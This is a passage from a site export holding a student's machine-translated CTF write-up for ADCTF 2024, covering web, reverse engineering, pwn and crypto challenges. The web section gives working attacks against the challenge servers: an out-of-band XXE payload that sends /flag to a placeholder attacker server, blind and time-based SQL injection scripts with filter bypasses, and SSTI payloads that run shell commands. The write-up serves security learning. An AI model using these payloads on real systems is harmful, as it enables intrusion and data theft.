2024","externalUrl":null,"permalink":"/en/tags/about/","section":"Tags","summary":"","title":"about","type":"tags"},{"content":" WHO AM I? # Student at Guangdong University of Technology A\u0026amp;D Studio Members \u0026hellip;\u0026hellip; ","date":"17 December 2024","externalUrl":null,"permalink":"/en/about/","section":"HOME","summary":"WHO AM I?","title":"ABOUT","type":"page"},{"content":" WARNING！ This is a machine translated version of the Chinese page Web # xxe # Backdoor found after opening using jd-gui\n@GetMapping({\u0026#34;/backdoor\u0026#34;}) @ResponseBody public String hack(@RequestParam String fname) throws IOException, SAXException { DefaultResourceLoader resourceLoader = new DefaultResourceLoader(); byte[] content = resourceLoader.getResource(fname).getContentAsByteArray(); if (content != null) { XMLReader reader = XMLReaderFactory.createXMLReader(); reader.parse(new InputSource(new ByteArrayInputStream(content))); return \u0026#34;success\u0026#34;; } return \u0026#34;error\u0026#34;; } Pass in fname and parse XML\nfname is controllable and can be passed into external XML\nConstruct XXE to read flag\n# eval.xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE ANY [ \u0026lt;!ENTITY % xd SYSTEM \u0026#34;http://LINK_TO_YOUR_SERVER/eval.dtd\u0026#34;\u0026gt; %xd; ]\u0026gt; \u0026lt;root\u0026gt;\u0026amp;bbbb;\u0026amp;demo;\u0026lt;/root\u0026gt; # eval.dtd \u0026lt;!ENTITY % aaaa SYSTEM \u0026#34;file:///flag\u0026#34;\u0026gt; \u0026lt;!ENTITY % demo \u0026#34;\u0026lt;!ENTITY bbbb SYSTEM \u0026#39;http://LINK_TO_YOUR_SERVER/?file=%aaaa;\u0026#39;\u0026gt;\u0026#34;\u0026gt; %demo; Listen for http requests locally\npython3 -m http.server 9000 Initiate a request to trigger XXE\nhttp://TARGET:33008/backdoor?fname=http://LINK_TO_YOUR_SERVER/eval.xml\nGet the flag in the request log\n120.230.56.2 - - [30/Nov/2024 23:03:20] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:03:20] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:03:40] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:03:40] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:04:08] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:04:08] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:05:09] \u0026ldquo;GET /eval.xml HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:05:09] \u0026ldquo;GET /eval.dtd HTTP/1.1\u0026rdquo; 200 - 120.230.56.2 - - [30/Nov/2024 23:05:09] \u0026ldquo;GET /?file=ADCTF{WOW_Y0u_Kn0w_H0w_to_use_Blind_XXE} HTTP/1.1\u0026rdquo; 200 -\nADCTF{WOW_Y0u_Kn0w_H0w_to_use_Blind_XXE}\nsql1 # Pass the serialized string of student from POST(data) and query $student after filtering\n$black_list = \u0026#39;/\\=|\\\\x20|\\\\n|union|substr|ascii|\\//i\u0026#39;; Filtered union, ascii, substr, space, equal sign, newline\nUnable to use union injection, ascii can be replaced with ord, substr can be replaced with mid, spaces can be replaced with tabs, and equal signs can be replaced with like (which is not actually used)\nEcho is available, runs the Boolean blind injection script directly\nimport httpx import readline import html import re import urllib.parse target = \u0026#39;http://TARGET:33001/\u0026#39; passphrase = \u0026#39;C H A N G E M E\u0026#39; def exp(payload: str, out:bool): payload = f\u0026#34;Alice\u0026#39;\u0026amp;\u0026amp; {payload} #\u0026#34; payload = payload.replace(\u0026#39;=\u0026#39;, \u0026#39; like \u0026#39;) payload = payload.replace(\u0026#39; \u0026#39;,\u0026#39;\\t\u0026#39;) payload = { \u0026#39;data\u0026#39;: \u0026#39;O:7:\u0026#34;Student\u0026#34;:1:{s:12:\u0026#34;student_name\u0026#34;;s:\u0026#39;+\u0026#34;{}\u0026#34;.format(len(payload))+\u0026#39;:\u0026#34;\u0026#39;+payload+\u0026#39;\u0026#34;;}\u0026#39; } auth = httpx.BasicAuth(\u0026#39;user\u0026#39;, passphrase) r = httpx.post(target, data=payload,auth=auth,timeout=60) pattern = r\u0026#39;\u0026lt;/code\u0026gt;(.*)\u0026#39; result = re.search(pattern, r.text) # if out: # print(result.group(1)) if(\u0026#39;Alice\u0026#39; in result.group(1)): if(out): print(True) return True elif (\u0026#39;no\u0026#39; in result.group(1)): print(\u0026#39;**Filtered**\u0026#39;) print(payload) else: if(out): print(False) return False if __name__ == \u0026#39;__main__\u0026#39;: result = \u0026#39;\u0026#39; sql = \u0026#34;(select group_concat(secret_value) from secrets)\u0026#34; length = 88 for i in range(1,length + 1): left = 0 right = 127 while right - left \u0026gt; 1: mid = int((left+right)/2) print(f\u0026#39;[{i}] {left} {right} \u0026#39;,end=\u0026#39;\\r\u0026#39;) payload = f\u0026#39;ord(mid({sql},{i},1)) \u0026gt; {mid}\u0026#39; if(exp(payload, False)): left = mid else: right = mid print(f\u0026#39;{chr(right)} {right} [{i}/{length}]\u0026#39;) result += chr(right) print(result) while True: exp(input(\u0026#39;\u0026gt; \u0026#39;), True) flag{53048e06-1dbe-423b-8cf8-458ccd591a58}\nsql2 # Same as sql1, the only difference is that there is no echo, and time blind injection must be used\nimport httpx import readline import html import re import urllib.parse from datetime import datetime import time target = \u0026#39;http://TARGET:33004/\u0026#39; passphrase = \u0026#39;02e9f90e494fe5a2727176f6952abc99\u0026#39; def exp(payload: str, out:bool): # build payload payload = f\u0026#34;Alice\u0026#39;\u0026amp;\u0026amp; IF({payload},SLEEP(1),2) #\u0026#34; # bypass detect payload = payload.replace(\u0026#39;=\u0026#39;, \u0026#39; like \u0026#39;) payload = payload.replace(\u0026#39; \u0026#39;,\u0026#39;\\t\u0026#39;) payload = { \u0026#39;data\u0026#39;: \u0026#39;O:7:\u0026#34;Student\u0026#34;:1:{s:12:\u0026#34;student_name\u0026#34;;s:\u0026#39;+\u0026#34;{}\u0026#34;.format(len(payload))+\u0026#39;:\u0026#34;\u0026#39;+payload+\u0026#39;\u0026#34;;}\u0026#39; } # Start Quere auth = httpx.BasicAuth(\u0026#39;user\u0026#39;, passphrase) Time = datetime.now() r = httpx.post(target, data=payload,auth=auth,timeout=60) Time = datetime.now() - Time # process result if (out): print(f\u0026#39;Cost: {Time}\u0026#39;) pattern = r\u0026#39;\u0026lt;/code\u0026gt;(.*)\u0026#39; result = re.search(pattern, r.text) if (\u0026#39;no\u0026#39; in result.group(1)): print(\u0026#39;**Filtered**\u0026#39;) print(payload) if (Time.seconds \u0026gt; 5): print(\u0026#34;WARNING: SPEED LIMIT HAPPEDED\u0026#34;) print(payload) if (Time.seconds \u0026gt; 1): if (out): print (True) return True if (out): print(False) return False if __name__ == \u0026#39;__main__\u0026#39;: result = \u0026#39;\u0026#39; sql = \u0026#34;(select group_concat(secret_value) from secrets)\u0026#34; length = 88 for i in range(1,length + 1): left = 0 right = 127 while right - left \u0026gt; 1: mid = int((left+right)/2) print(left,right,end=\u0026#39;\\r\u0026#39;) payload = f\u0026#39;ord(mid({sql},{i},1)) \u0026gt; {mid}\u0026#39; if(exp(payload, False)): left = mid else: right = mid time.sleep(0.1) print(f\u0026#39;{chr(right)} {right} [{i}/{length}]\u0026#39;) result += chr(right) print(result) while True: exp(input(\u0026#39;\u0026gt; \u0026#39;), True) flag{2572e0bf-30d1-4c8d-b512-6ded054f21a6}\nsst1 # Visit the target address to get the website source code\nfrom flask import Flask, request, render_template_string from hashlib import md5 app = Flask(__name__) black_list = [\u0026#39;[\u0026#39;,\u0026#39;\\\u0026#39;\u0026#39;] def waf(name): for x in black_list: if x in name.lower(): print(x) return True return False @app.route(\u0026#39;/\u0026#39;) def index(): return open(__file__).read() @app.post(\u0026#39;/exp\u0026#39;) def user(): exp = request.form.get(\u0026#34;exp\u0026#34;) digest = request.form.get(\u0026#34;digest\u0026#34;) if not exp: return \u0026#39;need exp\u0026#39; if not digest: return \u0026#39;need digest\u0026#39; if not digest == md5(exp.encode()).hexdigest(): return \u0026#39;digest not match\u0026#39; if waf(exp): return \u0026#34;No hacker\u0026#34; return render_template_string(exp) if __name__ == \u0026#39;__main__\u0026#39;: app.run(\u0026#34;0.0.0.0\u0026#34;, port=11111) Template injection vulnerability appears in /exp route\nYou can see that brackets and backslashes are filtered\nConstructing the payload\n{{().__class__.__base__.__subclasses__().__getitem__(137).__init__.__globals__.__builtins__.__getitem__(\u0026#34;eval\u0026#34;)(\u0026#34;__import__(\\\u0026#34;os\\\u0026#34;).popen(\\\u0026#34;cat flag\\\u0026#34;).read()\u0026#34;)}} Execute to get flag\nflag{a8e5f202-9aac-49b8-ad8f-7fa2c0ac8130}\nsst2 # To be honest, I have no idea how to bypass ssti. I have been working on it for a day but still can\u0026rsquo;t figure it out. Please allow me to be a script kiddie for once.\nUse fenjing to construct the payload, and then manually construct the request\nMarven11/Fenjing 专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 | A Jinja2 SSTI cracker for bypassing WAF, designed for CTF Python 1160 74 import httpx import html import readline from hashlib import md5 import fenjing target = \u0026#39;http://TARGET:33008/exp\u0026#39; # target = \u0026#39;http://127.0.0.1:11111/exp\u0026#39; passphrase = \u0026#39;7f036f4d2e2986b8bbdc89187aabf82d\u0026#39; black_list = [\u0026#39;\\\u0026#39;\u0026#39;,\u0026#39;\u0026#34;\u0026#39;,\u0026#39;lipsum\u0026#39;,\u0026#39;.\u0026#39;,\u0026#39;[\u0026#39;] def waf(name): for x in black_list: if x in name.lower(): # print(x) return False return True def exp(payload): shell_payload, _ = fenjing.exec_cmd_payload(waf, payload) auth = httpx.BasicAuth(username=\u0026#34;user\u0026#34;, password=passphrase) data = { \u0026#39;exp\u0026#39;: shell_payload, \u0026#39;digest\u0026#39;:md5(shell_payload.encode()).hexdigest() } r = httpx.post(target,data=data,auth=auth) print(f\u0026#39;[+] Payload: {shell_payload}\u0026#39;) print(html.unescape(r.text)) if __name__ == \u0026#39;__main__\u0026#39;: while True: exp(input(\u0026#39;\u0026gt; \u0026#39;)) flag{56199a9d-6772-4f27-b78a-9a40f9056db4}\nlottery # Base64 string found in events/2.json\nZmxhZ3thY2FlNTkwMC1hNDg4LTQ0YzUtYWM0YS0wNmYzMTM5Y2NjZWR9Cg==\nDecode to get flag\nflag{acae5900-a488-44c5-ac4a-06f3139ccced}\nSign_in_ADCTF # See the hint in the source code\n\u0026lt;!-- H1NT: Call Sign_in_AD() to complete the sign-in --\u0026gt; Open the console and execute Sign_in_AD() when the web page is refreshed\nSee the hint:\nSigned in successfully! But the flag is in the picture^V^\nDownload the image and put it into Kali to view the EXIF ​​information:\nEXIF tags in \u0026lsquo;./sign.jpg\u0026rsquo; (\u0026lsquo;Motorola\u0026rsquo; byte order): \u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026ndash;+\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;- Tag |Value \u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026ndash;+\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;- Artist |Ak1yamaM1O XP Comment |Follow the ad studio official account and send \u0026ldquo;ADCTF2024\u0026rdquo; to get the flag XP Author |Ak1yamaM1O Padding |268 bytes undefined data X-Resolution |72 Y-Resolution |72 Resolution Unit |Inch Padding |268 bytes undefined data Exif Version |Exif Version 2.1 FlashPixVersion |FlashPix Version 1.0 Color Space |Uncalibrated \u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026ndash;+\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;\u0026mdash;-\nFollow the prompts to get the flag\nflag{We1c0me_2o_ADCTF_2O24_H4V4_6o09_t1m3}\nonlineJava # No tricks, just execute the shell\ntry { String command = \u0026#34;cat /flag\u0026#34;; Process process = Runtime.getRuntime().exec(command); java.io.InputStream inputStream = process.getInputStream(); java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } process.waitFor(); } catch (Exception e) { e.printStackTrace(); } Reverse # checkin # IDA opens and finds that it is an XOR encryption Encryption uses random numbers But the random number seed has been specified So the random number you get each time is the same\nExtract the encrypted flag using LazyIDA\nencoded = \u0026#34;\\x55\\x17\\xC9\\xBB\\x4A\\xA5\\x86\\xDF\\x24\\x0A\\x1C\\xA3\\x27\\xA1\\x57\\x35\\xC3\\xDB\\x91\\x88\\x6D\\x91\\xA0\\xCC\\x71\\x57\\x71\\xE4\\x40\\x00\u0026#34;; Write a decryption script:\n#include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; int main(){ srand(0x7E8u); char s[] = \u0026#34;\\x55\\x17\\xC9\\xBB\\x4A\\xA5\\x86\\xDF\\x24\\x0A\\x1C\\xA3\\x27\\xA1\\x57\\x35\\xC3\\xDB\\x91\\x88\\x6D\\x91\\xA0\\xCC\\x71\\x57\\x71\\xE4\\x40\\x00\u0026#34;; for ( int i = 0; i \u0026lt;= 28; ++i ) s[i] ^= rand(); puts(s); return 0; } flag{y0u_Know_rAnd0m_4nd_xOr}\nezPy # Look at the icon to know it is Python (you can also know it from the title)\nuse pyinstxtractor to get pyc file\nThen use pylingual to disassemble pyc file\n# Decompiled with PyLingual (https://pylingual.io) # Internal filename: main.py # Bytecode version: 3.9.0beta5 (3425) # Source timestamp: 1970-01-01 00:00:00 UTC (0) import sys secret = [631, 1205, -500, 1021, 1879, 668, -281, 1651, 1326, 593, 428, -170, 515, 1302, 452, 41, 814, 379, 382, 629, 650, 273, 1529, 630, 418, 1207, 1076, 315, 1118, 469, 398, 1803, 647, 729, 1439, 1104] flag = input(\u0026#39;Please enter the flag:\u0026#39;) flag = [ord(c) for c in flag] if len(flag) != 36: print(\u0026#39;Wrong flag length\u0026#39;) sys.exit() encoded = [0 for _ in range(36)] for i in range(0, 36, 9): encoded[i] = 3 * flag[i] + 7 * flag[i + 1] - 2 * flag[i + 2] + 5 * flag[i + 3] - 6 * flag[i + 4] - 14 encoded[i + 1] = -5 * flag[i + 1] + 9 * flag[i + 2] + 4 * flag[i + 3] - 3 * flag[i + 4] + 7 * flag[i + 5] - 18 encoded[i + 2] = 6 * flag[i + 0] - 4 * flag[i + 1] + 2 * flag[i + 2] - 9 * flag[i + 5] + 5 * flag[i + 6] - 25 encoded[i + 3] = 7 * flag[i + 1] + 3 * flag[i + 3] - 8 * flag[i + 4] + 6 * flag[i + 5] - 2 * flag[i + 6] + 4 * flag[i + 7] - 30 encoded[i + 4] = 2 * flag[i + 0] + 5 * flag[i + 2] - 4 * flag[i + 4] + 7 * flag[i + 5] + 9 * flag[i + 8] - 20 encoded[i + 5] = 8 * flag[i + 0] - 3 * flag[i + 1] + 5 * flag[i + 3] - 6 * flag[i + 7] + 2 * flag[i + 8] - 19 encoded[i + 6] = -7 * flag[i + 1] + 4 * flag[i + 2] - 5 * flag[i + 5] + 3 * flag[i + 6] + 6 * flag[i + 8] - 22 encoded[i + 7] = 9 * flag[i + 0] + 2 * flag[i + 2] + 6 * flag[i + 3] - 4 * flag[i + 6] + 5 * flag[i + 7] - 3 * flag[i + 8] - 27 encoded[i + 8] = 4 * flag[i + 0] - 5 * flag[i + 4] + 7 * flag[i + 5] + 3 * flag[i + 6] + 9 * flag[i + 7] - 2 * flag[i + 8] - 33 if encoded == secret: print(\u0026#39;Correct!\u0026#39;) else: print(\u0026#39;Wrong!\u0026#39;) use z3 to solve it\nfrom z3 import * solver = Solver() flag = [Int(f\u0026#39;flag_{i}\u0026#39;) for i in range(36)] secret = [631, 1205, -500, 1021, 1879, 668, -281, 1651, 1326, 593, 428, -170, 515, 1302, 452, 41, 814, 379, 382, 629, 650, 273, 1529, 630, 418, 1207, 1076, 315, 1118, 469, 398, 1803, 647, 729, 1439, 1104] solver.add([flag[i] \u0026gt;= 0 for i in range(36)]) solver.add([flag[i] \u0026lt;= 255 for i in range(36)]) for i in range(0, 36, 9): solver.add(3 * flag[i] + 7 * flag[i + 1] - 2 * flag[i + 2] + 5 * flag[i + 3] - 6 * flag[i + 4] - 14 == secret[i]) solver.add(-5 * flag[i + 1] + 9 * flag[i + 2] + 4 * flag[i + 3] - 3 * flag[i + 4] + 7 * flag[i + 5] - 18 == secret[i + 1]) solver.add(6 * flag[i + 0] - 4 * flag[i + 1] + 2 * flag[i + 2] - 9 * flag[i + 5] + 5 * flag[i + 6] - 25 == secret[i + 2]) solver.add(7 * flag[i + 1] + 3 * flag[i + 3] - 8 * flag[i + 4] + 6 * flag[i + 5] - 2 * flag[i + 6] + 4 * flag[i + 7] - 30 == secret[i + 3]) solver.add(2 * flag[i + 0] + 5 * flag[i + 2] - 4 * flag[i + 4] + 7 * flag[i + 5] + 9 * flag[i + 8] - 20 == secret[i + 4]) solver.add(8 * flag[i + 0] - 3 * flag[i + 1] + 5 * flag[i + 3] - 6 * flag[i + 7] + 2 * flag[i + 8] - 19 == secret[i + 5]) solver.add(-7 * flag[i + 1] + 4 * flag[i + 2] - 5 * flag[i + 5] + 3 * flag[i + 6] + 6 * flag[i + 8] - 22 == secret[i + 6]) solver.add(9 * flag[i + 0] + 2 * flag[i + 2] + 6 * flag[i + 3] - 4 * flag[i + 6] + 5 * flag[i + 7] - 3 * flag[i + 8] - 27 == secret[i + 7]) solver.add(4 * flag[i + 0] - 5 * flag[i + 4] + 7 * flag[i + 5] + 3 * flag[i + 6] + 9 * flag[i + 7] - 2 * flag[i + 8] - 33 == secret[i + 8]) if solver.check() == sat: model = solver.model() flag_result = \u0026#39;\u0026#39;.join(chr(model[flag[i]].as_long()) for i in range(36)) print(f\u0026#34;Flag: {flag_result}\u0026#34;) else: print(\u0026#34;No solution found\u0026#34;) flag{y0U_4rE_r3@1ly_g0o0oOd_At_m4Th}\nPy_revenge # I guess it is Python (you can also know it from the title)\npyinstxtractor + PyLingual to get source code\n# Decompiled with PyLingual (https://pylingual.io) # Internal filename: main.py # Bytecode version: 3.12.0rc2 (3531) # Source timestamp: 1970-01-01 00:00:00 UTC (0) import base64 secret = [27, 40, 57, 63, 24, 4, 66, 4, 100, 122, 8, 27, 21, 122, 4, 15, 122, 20, 17, 98, 25, 115, 55, 82, 74, 71, 23, 20, 9, 26, 28, 105, 95, 34, 90, 46] flag = input(\u0026#39;Please enter the flag:\u0026#39;) flag = base64.b64encode(flag.encode()).decode() flag = [ord(c) for c in flag] key = \u0026#39;ADCTF2024\u0026#39; for i in range(len(flag)): flag[i] ^= ord(key[i % len(key)]) flag[i] ^= i if flag == secret: print(\u0026#39;Correct!\u0026#39;) else: print(\u0026#39;Wrong!\u0026#39;) It looks like XOR + Base64\nJust XOR it once, and then decode Base64\nimport base64 secret = [27, 40, 57, 63, 24, 4, 66, 4, 100, 122, 8, 27, 21, 122, 4, 15, 122, 20, 17, 98, 25, 115, 55, 82, 74, 71, 23, 20, 9, 26, 28, 105, 95, 34, 90, 46] key = \u0026#39;ADCTF2024\u0026#39; result = \u0026#39;\u0026#39; for i in range(len(secret)): secret[i] ^= i secret[i] ^= ord(key[i % len(key)]) result += chr(secret[i]) print(base64.b64decode(result).decode()) Pwn # binsh # Use IDA open it and finds that only two characters can be entered If the second character is h(104), replace it with b(98)\nAt first I had no idea why the second character appeared as h.\nFinally I remembered sh\nChanging sh to sb is really bad.(In the Chinese context, this is an insult.)\nRemember that $0 can also call the shell\nflag{583b4daf-a393-4bcd-b93e-2100c2ce77d6}\nmeow # There is nothing much to say about the script question. Meow~\nfrom pwn import * li = lambda x : print(\u0026#39;\\x1b[01;38;5;214m\u0026#39; + str(x) + \u0026#39;\\x1b[0m\u0026#39;) ll = lambda x : print(\u0026#39;\\x1b[01;38;5;1m\u0026#39;+ str(x) + \u0026#39;\\x1b[0m\u0026#39;) def dbg(p : process): gdb.attach(p, \u0026#39;source ~/Programs/pwndbg/gdbinit.py\u0026#39;) # Config LOCAL = False file = \u0026#39;./meow\u0026#39; remote_addr = \u0026#39;0.0.0.0\u0026#39; remote_port = 65535 context.log_level=\u0026#39;DEBUG\u0026#39; # [\u0026#39;CRITICAL\u0026#39;, \u0026#39;DEBUG\u0026#39;, \u0026#39;ERROR\u0026#39;, \u0026#39;INFO\u0026#39;, \u0026#39;NOTSET\u0026#39;, \u0026#39;WARNING\u0026#39;] elf = ELF(file) context.binary = elf def get_Process(): if LOCAL: p = process(file) else: p = remote(remote_addr ,remote_port) p.sendlineafter(b\u0026#39;Type your passphrase: \u0026#39;, b\u0026#39;passphrase\u0026#39;) return p def exp(): p = get_Process() # p.interactive() # Real Start of EXP p.sendlineafter(\u0026#34;请回复\u0026#39;喵~\u0026#39;开始\\n\u0026#34;.encode(), \u0026#39;喵~\u0026#39;.encode()) while True: payload = p.recvline().decode()[:-1] print(payload) if (payload[-1] == \u0026#39;?\u0026#39;): payload = payload[:-1] + \u0026#39;喵?\u0026#39; elif (payload[-1] == \u0026#39;!\u0026#39;): payload = payload[:-1] + \u0026#39;喵!\u0026#39; else: payload = payload + \u0026#39;喵~\u0026#39; print(payload) p.sendlineafter(\u0026#39;请输入:\u0026#39;.encode(),payload.encode()) p.interactive() if __name__ == \u0026#39;__main__\u0026#39;: exp() flag{d8facb39-2990-4efa-9649-9c7242acaa5d}喵~\nCrypto # Use_Many_Time # Template problem, nothing much to say\nGet p,q from factordb\nfrom Crypto.Util.number import * n = 271472624424656513785706923680771932133715054033425980394077073568817784367419534373403335781047213279328099684778631075010020852340363239109929257593123636490472788742710500691829271154406656967499570620808599990809022444747721621226472999098447873973754640477256467566021323433300316782379572843249101957097476171914061796763882160221810752037588477825281339421214989804806106422337645286183603182582435570582060051797114488129892907097969025919044345960281472097528350236904382867201532480293547156397634024888874181247945486724100923198368861164414053799229573809643496189560293961228262358439897447721272077026577955596476378495555781331390802631948596505810532333928413691919085783591350817862501247468922625100225243353014466352465524402884992557288475473449673329173477799355005388403603540849669807448000951133101061837473065442841126173160221586401667999743065475436042231713071217028338553851930804379457014815136497217622172942725789731656487365400662759041673246263952305177330273165040055678540346032835777756018333782404380070921037783724200080770052468396586141345852821959354352496376533002799798666280242749703930834932216393024552332394747366870653579192862981203841223970368967884378029041333485930753022670356279089241919852655226148387261758145662448291834484689828355196376588241880452162468344771724832727747146706203875543683244719198324124061667256741010066117105718405978693348972717642194095091616302700592766673624550504917867603634542541368375740266071937725051550575451618436991290662488896868128637569245079892637758352664528618064223657481155853608868600031926390171851091738102791194299611556416648756888113654937238624189138830880418480962906152416654876445398057632196937986995992085822575718165073591892866350194485467016785653412183994633115928254714676975956375674614875957033175065090009966949952689186250766814233600527752382571007342869177096365187528130392174264920694275768322770528821969405178452047175169237214071424708443772771459072348156584802498912079521950348331820925988369966076070172436223669851674684504470256163223470647039446081938764730223121989464510919117939913290460289762676092275797366737539534123024502760506615782714363240028877215121539549927135722120154270580276684945221133223162306832578280630822912653337205489280151793861613547764311383072014368485459881701386311716195796935045277483356584921699345142082381019935250848231570451880495222569509469558179017999387883489730684745699017658729849361 c = 262959409928901942946356967282715685988402717525722998413073199552344194569815462675208727317356069038143476887785349729074152415468561305043719564044443534943678461691194112819829009942015928217138669440068055198678626228169095209700084857903899952032493859312798134830127847836090483339421488013318184521018942602658859674923143870041870487415119261615851991532534606572685371087892175187669735837173802901707243259478231127246547498003861531872712139399220445465633130401043038236189470250375275092537677136076465523278093135254194321212116731237463794930347080005994129860018818529190275740308829411887853496055005914245757890730455096895759851033070483269010908006762902321856837578539257154697504866923667155835568667100011559417194297036546745102722888382810645788593405822297665771079070110912560494209334914533558309387853851664235646634342550739566564027709387611635084010476988602665679274092312701989498548485452833766131120307212434583895800389361158177620204656479294383838488961384696760004965555832729706574445815485286337177591334864985323203962452816823109401292600686290645753703318285223851373494687341332009673985128472618489951377449004314976075061089812435706552393436214957004589524906307287978580991550974217938678109879592869816607502026007252288475327472451287082697741140324509606631465050160462644047707063687221390874129122094235339213836858331145379658693745765989963094532579285786465378971800497606443969187141241371884417409400393554875676670693772124227967787087249970176123360898925123323833553629516940180273052472844245188596972497171407972537936080054594306016800782067609134239410680549083033727692776112628144869503299586655898231079773579227330327159838200652203600435140335585943871110523667774597723803449181446601397378968006674324753246013580929038935474151143294980592601911423698794436171646021633991328190789552835952437637863496011173604086905984318805710258969051632322326111378923301936151648733712292832400228718852555700089350581693206572448860973715415938816675920101336567495654357573191994730856103857549775016982813567025601029715927459867603513676152935188298681539416993775403152002836985599653470480800354152755275582198243528888697069870892345692931591655818148732228227890569700323009808337822568147429445530219871559528924454126891741517141491673059521896789132434077118608327133800491064640223646492279791064413028951228474075277822487467158841147454754127758427097085005104226495027785164273717534964 p = 22826089215015062971239747479765573980261860956508924966887672339011131256071593933855569627345730491900186620681430083447450449800363453742460910559038500884300216627993746389795089330113851499728923389157896774203901873995580499872010382271176165914123608852269645266420541883312655519483268190334714005528424143016351241964111694448438696041108115955227931375862495974220469117197567953528127044121313985354817794430503700199549401649666484648419628490258677717450705269977839872907619635351260327914403045603763386492257545870697934887022012834074741429555229113461953163363204273114559929014526316520808246516691 e = 65537 phi_n = p**3 * (p - 1) d = inverse(e, phi_n) m = pow(c, d, n) plaintext = long_to_bytes(m) print(plaintext) flag{another_weird_construction}\nToo_Close_To_Sqrt # Two adjacent prime numbers, which means that we can square and pq will come out directly after running for a while.\nfrom gmpy2 import isqrt from Crypto.Util.number import * n = 77110253337392483710762885851693115398718726693715564954496625571775664359421696802771127484396119363821442323280817855193791448966346325672454247192244603281463595140923987182065095198239715749980911991399313395478292871386248479783966672279960117003211050451721307589036878362258617072298763845707881171743025954660306653186069633961424298647787491228085801739935823867940079473418881721402983930102278146132444200918211570297746753023639071980907968315022004518691979622641358951345391364430806558132988012728594904676117146959007388204192026655365596585273466096578234688721967922267682066710965927143418418189061 c = 702169486130185630321527556026041034472676838451810139529487621183247331904842057079283224928768517113408797087181581480998121028501323357655408002432408893862758626561073997320904805861882437888050151254177440453995235705432462544064680391673889537055043464482935772971360736797960328738609078425683870759310570638726605063168459207781397030244493359714270821300687562579988959673816634095712866030123140597773571541522765682883740928146364852979096568241392987132397744676804445290807040450917391600712817423804313823998912230965373385456071776639302417042258135008463458352605827748674554004125037538659993074220 e = 65537 p = isqrt(n) while n % p != 0: p += 1 q = n // p phi_n = (p-1)*(q-1) d = inverse(e,phi_n) m = pow(c, d, n) print(long_to_bytes(m)) flag{oops_the_N_is_not_secure}\nOne_Way_Function # sha512 with only a single character\nRainbow Table Attack\nfrom hashlib import sha512 charset = \u0026#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_{}\u0026#39; rainbow_table = {} for c in charset: rainbow_table[sha512(c.encode()).hexdigest()] = c hashes = [ \u0026#39;711c22448e721e5491d8245b49425aa861f1fc4a15287f0735e203799b65cffec50b5abd0fddd91cd643aeb3b530d48f05e258e7e230a94ed5025c1387bb4e1b\u0026#39;, \u0026#39;f10127742e07a7705735572f823574b89aaf1cbe071935cb9e75e5cfeb817700cb484d1100a10ad5c32b59c3d6565211108aa9ef0611d7ec830c1b66f60e614d\u0026#39;, ...... ] flag = \u0026#39;\u0026#39; for hash in hashes: if hash in rainbow_table: flag += rainbow_table[hash] else: print(f\u0026#34;{hash} not found\u0026#34;) print(flag) flag{d4d07133-d6bb-4add-b194-8c8eec4bb33f}\nOne_Key_pad # from secret import flag, key ciphertext = [] for f in flag: ciphertext.append((f ^ key)) print(bytes(ciphertext).hex()) e0eae7e1fde3e7fcffd9fee9f4fb Seeing that the flag is encrypted byte by byte, there are only 256 possible keys, so just enumerate the keys\nciphertext = bytes.fromhex(\u0026#39;e0eae7e1fde3e7fcffd9fee9f4fb\u0026#39;) for key in range(0xff): flag = b\u0026#39;\u0026#39; for c in ciphertext: flag += bytes([c^key]) if flag.startswith(b\u0026#39;flag{\u0026#39;): print(flag.decode()) exit() Check_Your_Factor_Database # FactorDB\nfrom Crypto.Util.number import * n = 15583202069585885743329731770693703651315744619547748987654328267750897298525457052637246322711018450296389785154280944187494218432166414466847580546888232777346390261326052791442303045476056323506639620708060686276665740035963899932923469306092864734507521103929958343335077640138132147823877965255516681640595305323863184079626094607124637572731263072411094986661513874040186660293323912225991096820508525802441998965552628844336066341624032465148749156118031186277077034218599879172143727672732486930547036361186338853567795815703079141657486772887537131798381857481761128761701947613223163957583789997131996194389 c = 